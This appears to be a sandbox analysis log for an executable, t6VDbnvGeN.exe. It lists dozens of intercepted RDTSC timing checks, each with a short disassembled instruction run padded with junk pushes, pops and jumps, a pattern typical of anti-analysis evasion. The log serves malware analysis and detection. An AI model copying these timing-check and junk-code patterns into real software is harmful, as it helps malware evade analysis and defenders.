Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D38E2 second address: 10D3968 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1C28FAFD76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1C28FAFD75h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F1C28FAFD68h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xor edi, dword ptr [ebp+122D360Dh] 0x00000031 je 00007F1C28FAFD6Ch 0x00000037 push ecx 0x00000038 mov di, 8F9Eh 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D2C39h], eax 0x00000045 push 00000000h 0x00000047 jmp 00007F1C28FAFD6Dh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEB58 second address: 10CEB69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CDB15 second address: 10CDB20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1C28FAFD66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D3B71 second address: 10D3B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F1C29045F06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D3B85 second address: 10D3B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DD6B8 second address: 10DD6E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1C29045F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1C29045F0Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DD6E2 second address: 10DD73C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F1C28FAFD79h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 js 00007F1C28FAFD66h 0x0000001e jmp 00007F1C28FAFD6Fh 0x00000023 jo 00007F1C28FAFD66h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DDA10 second address: 10DDA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DDA14 second address: 10DDA1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34E2 second address: 10E34F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F1C29045F06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34F8 second address: 10E34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34FC second address: 10E3502 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3502 second address: 10E3507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3507 second address: 10E3546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F1C29045F0Eh 0x00000012 pop edi 0x00000013 jnp 00007F1C29045F19h 0x00000019 jmp 00007F1C29045F13h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3546 second address: 10E354D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E354D second address: 10E3563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3563 second address: 10E3567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3567 second address: F0B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 stc 0x0000000a push dword ptr [ebp+122D0721h] 0x00000010 cmc 0x00000011 call dword ptr [ebp+122D3306h] 0x00000017 pushad 0x00000018 jmp 00007F1C29045F12h 0x0000001d xor eax, eax 0x0000001f jmp 00007F1C29045F0Dh 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 add dword ptr [ebp+122D32F9h], esi 0x0000002e mov dword ptr [ebp+122D32F9h], edi 0x00000034 mov dword ptr [ebp+122D34CDh], eax 0x0000003a jg 00007F1C29045F0Ch 0x00000040 mov esi, 0000003Ch 0x00000045 or dword ptr [ebp+122D32F9h], esi 0x0000004b cmc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D32F9h], eax 0x00000056 lodsw 0x00000058 jnl 00007F1C29045F0Ch 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 cmc 0x00000063 mov ebx, dword ptr [esp+24h] 0x00000067 ja 00007F1C29045F1Ah 0x0000006d jg 00007F1C29045F14h 0x00000073 nop 0x00000074 pushad 0x00000075 pushad 0x00000076 push ecx 0x00000077 pop ecx 0x00000078 push edx 0x00000079 pop edx 0x0000007a popad 0x0000007b jmp 00007F1C29045F16h 0x00000080 popad 0x00000081 push eax 0x00000082 pushad 0x00000083 push eax 0x00000084 push edx 0x00000085 push ebx 0x00000086 pop ebx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7D65 second address: 10E7D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7D69 second address: 10E7D75 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1C29045F06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10724F7 second address: 10724FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E716B second address: 10E716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7418 second address: 10E741D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E741D second address: 10E745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1C29045F06h 0x0000000a pop edx 0x0000000b jmp 00007F1C29045F17h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C29045F19h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7C28 second address: 10E7C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107ADAA second address: 107ADAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDBEA second address: 10EDBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1C28FAFD66h 0x0000000a pop esi 0x0000000b jnp 00007F1C28FAFD6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDBFD second address: 10EDC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F1C29045F0Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDC15 second address: 10EDC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F07A4 second address: 10F07A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F07A8 second address: 10F07C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5E16 second address: 10F5E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4894 second address: 10F4899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4899 second address: 10F48E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F12h 0x00000009 jc 00007F1C29045F06h 0x0000000f jl 00007F1C29045F06h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1C29045F0Eh 0x0000001d jmp 00007F1C29045F15h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F48E1 second address: 10F48F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4A79 second address: 10F4A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4BF7 second address: 10F4C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1C28FAFD66h 0x0000000b ja 00007F1C28FAFD66h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4C14 second address: 10F4C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4C1A second address: 10F4C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5063 second address: 10F5067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5067 second address: 10F50A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F1C28FAFD66h 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F1C28FAFD71h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jmp 00007F1C28FAFD74h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F51FE second address: 10F5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Bh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5216 second address: 10F521B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5346 second address: 10F5371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Ah 0x00000009 jmp 00007F1C29045F18h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5371 second address: 10F5375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F58B7 second address: 10F58C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F58C5 second address: 10F58C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F58C9 second address: 10F58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F1C29045F12h 0x00000010 jl 00007F1C29045F06h 0x00000016 jp 00007F1C29045F06h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5CA9 second address: 10F5CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C28FAFD78h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FCB69 second address: 10FCB70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FB958 second address: 10FB962 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1C28FAFD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FB962 second address: 10FB97E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C29045F17h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FB97E second address: 10FB99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1C28FAFD77h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FBE93 second address: 10FBE99 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FBFEC second address: 10FBFF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FBFF2 second address: 10FBFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F1C29045F06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FBFFD second address: 10FC003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FC27E second address: 10FC291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 jno 00007F1C29045F06h 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FC3E9 second address: 10FC400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10FFE46 second address: 10FFE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C29045F0Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B600A second address: 10B6014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1C28FAFD66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6194 second address: 10B6198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6198 second address: 10B61A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6682 second address: 10B6687 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6892 second address: 10B689D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6AFD second address: 10B6B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6B02 second address: 10B6B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C28FAFD73h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f jbe 00007F1C28FAFD6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6B27 second address: 109F04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D2EDBh], ecx 0x0000000c call dword ptr [ebp+122D1C98h] 0x00000012 jl 00007F1C29045F37h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1C29045F15h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1100137 second address: 110013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11003E1 second address: 11003EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1C29045F06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11003EB second address: 11003F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110057C second address: 110058D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110058D second address: 110059B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1C28FAFD68h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110059B second address: 110059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110086C second address: 110088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1C28FAFD70h 0x0000000a pushad 0x0000000b jp 00007F1C28FAFD66h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11009C7 second address: 11009E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1C29045F17h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11009E5 second address: 11009EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1103822 second address: 1103829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1103996 second address: 11039BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C28FAFD73h 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F1C28FAFD66h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11039BA second address: 11039BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11039BE second address: 11039C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1103B4F second address: 1103B59 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1C29045F0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1105EDA second address: 1105F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1C28FAFD78h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F1C28FAFD66h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1105F04 second address: 1105F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1106055 second address: 110605F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1C28FAFD66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110AC63 second address: 110AC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110AC68 second address: 110AC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F1C28FAFD66h 0x0000000c rdtsc
